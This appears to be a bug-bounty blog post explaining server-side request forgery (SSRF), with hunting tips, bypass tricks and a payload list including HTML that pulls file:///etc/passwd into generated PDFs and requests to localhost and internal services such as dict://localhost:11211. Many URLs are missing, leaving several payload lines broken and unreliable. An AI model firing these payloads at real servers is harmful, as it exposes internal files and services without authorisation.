Server-Side Request Forgery, SSRF

erver-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behaviour of a server making a request that’s under the attacker’s control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organisations infrastructure, or to external third-party systems.

What are types of SSRF.

· Blind SSRF — occurs when you never get any information about a target service from the initial request

· Semi Blind SSRF

· Non-Blind SSRF

What is the impact of SSRF attacks?

A successful SSRF attack can often result in

· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.

· Scan Local or External Networks.

· Read Files from the Server & Internal Resources

· SSRF to Reflected XSS

· Can fetch the metadata of the servers.

Preventing Server Side Request Forgery (SSRF)

To prevent SSRF vulnerabilities in web applications it is strongly advised to use a white-listings of allowed domains and protocols from where the web server can fetch remote resources.

When you have to try for SSRF?

1. If you got Open Redirect try escalating it to SSRF.

2. SSRF to grep parameters may vulnerable to SSRF.

3. SSRF’s are more in API’s so crawl the whole web app with burp proxy turned on and search for keywords like., eg : ?url= , ?uri= , ?req=

4. Sign up with an Email like If u receive HTTP req. in collaborator then its SSRF. But if there’s no impact don’t report it, DNS and SMTP request doesn’t matters.

5. Try to find Blind SSRF on hidden parameter

6. Try Blind SSRF on referer header

How we can Perform a SSRF attack to a target application?

Some of the payloads for SSRF

URL based bypasses:\\@

Bypassing using a redirect

1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g.

2. Launch the SSRF pointing to will fetch YOUR_SERVER_IP which will redirect to

Bypassing using type=url

Change “type=file” to “type=url”

Paste URL in text field and hit enter

Using this vulnerability users can upload images from any image URL = trigger an SSRF

SSRF exploiting PDF file

<link rel=attachment href=”file:///root/secret.txt”>


The content of the file will be integrated inside the PDF as an image or text.

<img src=”echopwn” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/>



It will give something like

RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>

SSRF from Referrer



User Agent: Firefox


SSRF from File-upload — redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

JPG 301 response without and with a valid response body:

JSON 301 response without and with a valid response body:

CSV 301 response without and with a valid response body:

XML 301 response without and with a valid response body:

pdf 301 response without and with a valid response body:


1. AWS localhost is so don’t use there!

2. If you find any SSRF vulnerability that runs on EC2, try requesting :

SSRF URL for Oracle Cloud

SSRF URL for Alibaba

Few more Random Payloads that might be helpful in finding SSRF vulnerability.

Use the below payloads in the body of the request

GET /?url= HTTP/1.1

GET /?url=http://localhost/server-status HTTP/1.1

GET /?url= HTTP/1.1

GET /?url=dict://localhost:11211/stat

GET /?url=file:///etc/passwd

file:///, dict://, ftp:// gopher:// keywords

{“userId”: “1”, “url”: “http://127.0.1:513/"}

{“userId”: “1”, “url”: “"}

Some of the tools that can be used for SSRF

· SSRFmap —

· Gopherus —

· See-SURF —

· SSRF Sheriff —




A white hat Hacker...!!!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Mutually-beneficial partnership: Lossless protocol will secure the Duck DAO ecosystem

ID Checks Aren’t Always Foolproof — So What Do You Do?

Sentinel, a Rebrand on Cøsmos

Puzzle #2. 19

Deserialization Vulnerability From A Developer’s Perspective

Secret Network $SCRT staking guide by SG-1 Validator.

Black list, grey list, white list. Good and bad guy timeshare law firms

5 Basic Ways to Protect Your Digital Files from a Disaster

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash Venky

Akash Venky

A white hat Hacker...!!!

More from Medium

Interesting Stored XSS

Log4j Vulnerability Cheatsheet

XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain

What is an IDOR Vulnerability?